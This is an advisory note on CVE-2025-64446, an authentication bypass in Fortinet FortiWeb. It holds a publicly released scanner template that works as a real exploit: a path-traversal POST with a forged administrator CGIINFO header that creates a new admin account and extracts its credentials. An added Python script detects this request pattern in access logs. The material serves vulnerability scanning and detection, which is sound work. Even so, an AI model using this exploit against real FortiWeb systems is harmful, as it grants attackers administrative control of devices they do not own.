A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
PoC code [publicly available]
```yaml
id: CVE-2025-64446

info:
  name: FortiWeb - Authentication Bypass
  author: DhiyaneshDk,watchTowr,rapid7,defusedcyber
  severity: critical
  description: |
    A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
  impact: |
    Attackers can execute administrative commands remotely, potentially leading to full system compromise.
  remediation: |
    Update to the latest FortiWeb version beyond 8.0.1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-64446
    - https://x.com/defusedcyber/status/1975242250373517373
    - https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass
    - https://github.com/rapid7/metasploit-framework/pull/20698/files
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-64446
    epss-score: 0.36021
    epss-percentile: 0.96909
    cwe-id: CWE-23
    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"FortiWeb - "
  tags: cve,cve2025,vuln,fortiweb,fortigate,intrusive,auth-bypass,kev,vkev

variables:
  username: "{{to_lower(rand_text_alpha(8))}}"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
        Host: {{Hostname}}
        CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
        Content-Type: application/json

        {
          "data": {
            "q_type": 1,
            "name": "{{username}}",
            "access-profile": "prof_admin",
            "access-profile_val": "0",
            "last-name": "",
            "first-name": "",
            "email-address": "",
            "phone-number": "",
            "mobile-number": "",
            "hidden": 0,
            "comments": "",
            "sz_dashboard": -1,
            "type": "local-user",
            "type_val": "0",
            "admin-usergrp_val": "0",
            "wildcard_val": "0",
            "accprofile-override_val": "0",
            "sshkey": "",
            "trusthostv4": "127.0.0.1/8",
            "trusthostv6": "::1/128",
            "passwd-set-time": 0,
            "history-password-pos": 0,
            "history-password0": "",
            "history-password1": "",
            "history-password2": "",
            "history-password3": "",
            "history-password4": "",
            "history-password5": "",
            "history-password6": "",
            "history-password7": "",
            "history-password8": "",
            "history-password9": "",
            "force-password-change": "disable",
            "force-password-change_val": "0",
            "password": "{{password}}"
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"results":'
          - '"can_clone":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"USERNAME: "+ username'
          - '"PASSWORD: "+ password'
# digest: 4a0a00473045022100eaa0faa4bcf43a6aa1bd85cd3feb1540f18d49e19d507d810c3f2596d20dc4d402200aa1690e87493c4a0b906f0b62081639fba9fb0bcb60c4384e9253d59c03226c:922c64590222798bb761d5b6d8e72950
```
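As an added defensive example (not part of the template above or of any vendor code), the following Python scans access-log lines for the request shape this template sends: an `/api/` path that traverses into `/cgi-bin/fwbcgi`, and a base64 `CGIINFO` header asserting an administrator identity. The combined log format with `CGIINFO` logged as the last quoted field, and the sample lines themselves, are constructed assumptions.

```python
import base64
import json
import re
from urllib.parse import unquote

# Constructed access-log lines (combined format, CGIINFO header logged as the
# last quoted field). Sample data only, not taken from a real device.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Nov/2025:10:01:02 +0000] "POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1" 200 512 "-" "eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ=="
203.0.113.11 - - [14/Nov/2025:10:01:05 +0000] "GET /api/v2.0/cmdb/system/admin HTTP/1.1" 401 0 "-" "-"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+ '
    r'"[^"]*" "(?P<cgiinfo>[^"]*)"$'
)

def decode_cgiinfo(value):
    """Return the JSON object carried in a CGIINFO header, or None if absent/invalid."""
    if not value or value == "-":
        return None
    try:
        obj = json.loads(base64.b64decode(value, validate=True))
    except ValueError:  # binascii.Error, UnicodeDecodeError and JSONDecodeError
        return None
    return obj if isinstance(obj, dict) else None

def analyze_request(path, cgiinfo):
    """Reasons a request matches the CVE-2025-64446 pattern (empty list if benign)."""
    decoded = unquote(path)  # one decode pass: '%3f' becomes '?' so '/../' segments are explicit
    reasons = []
    if decoded.startswith("/api/") and "/../" in decoded and "/cgi-bin/fwbcgi" in decoded:
        reasons.append("API path traverses into /cgi-bin/fwbcgi")
    info = decode_cgiinfo(cgiinfo)
    if info and "username" in info:
        reasons.append("CGIINFO header asserts identity of %r" % info["username"])
    return reasons

def scan_log(text):
    """One finding per suspicious line; HTTP 200 on a traversal hit marks likely success."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_request(m["path"], m["cgiinfo"])
        if reasons:
            status = int(m["status"])
            success = status == 200 and any("traverses" in r for r in reasons)
            findings.append({"ip": m["ip"], "status": status, "reasons": reasons,
                             "likely_success": success})
    return findings
```

A 200 response to the traversal request is the same signal the template's matchers key on, so those lines are the ones to escalate first.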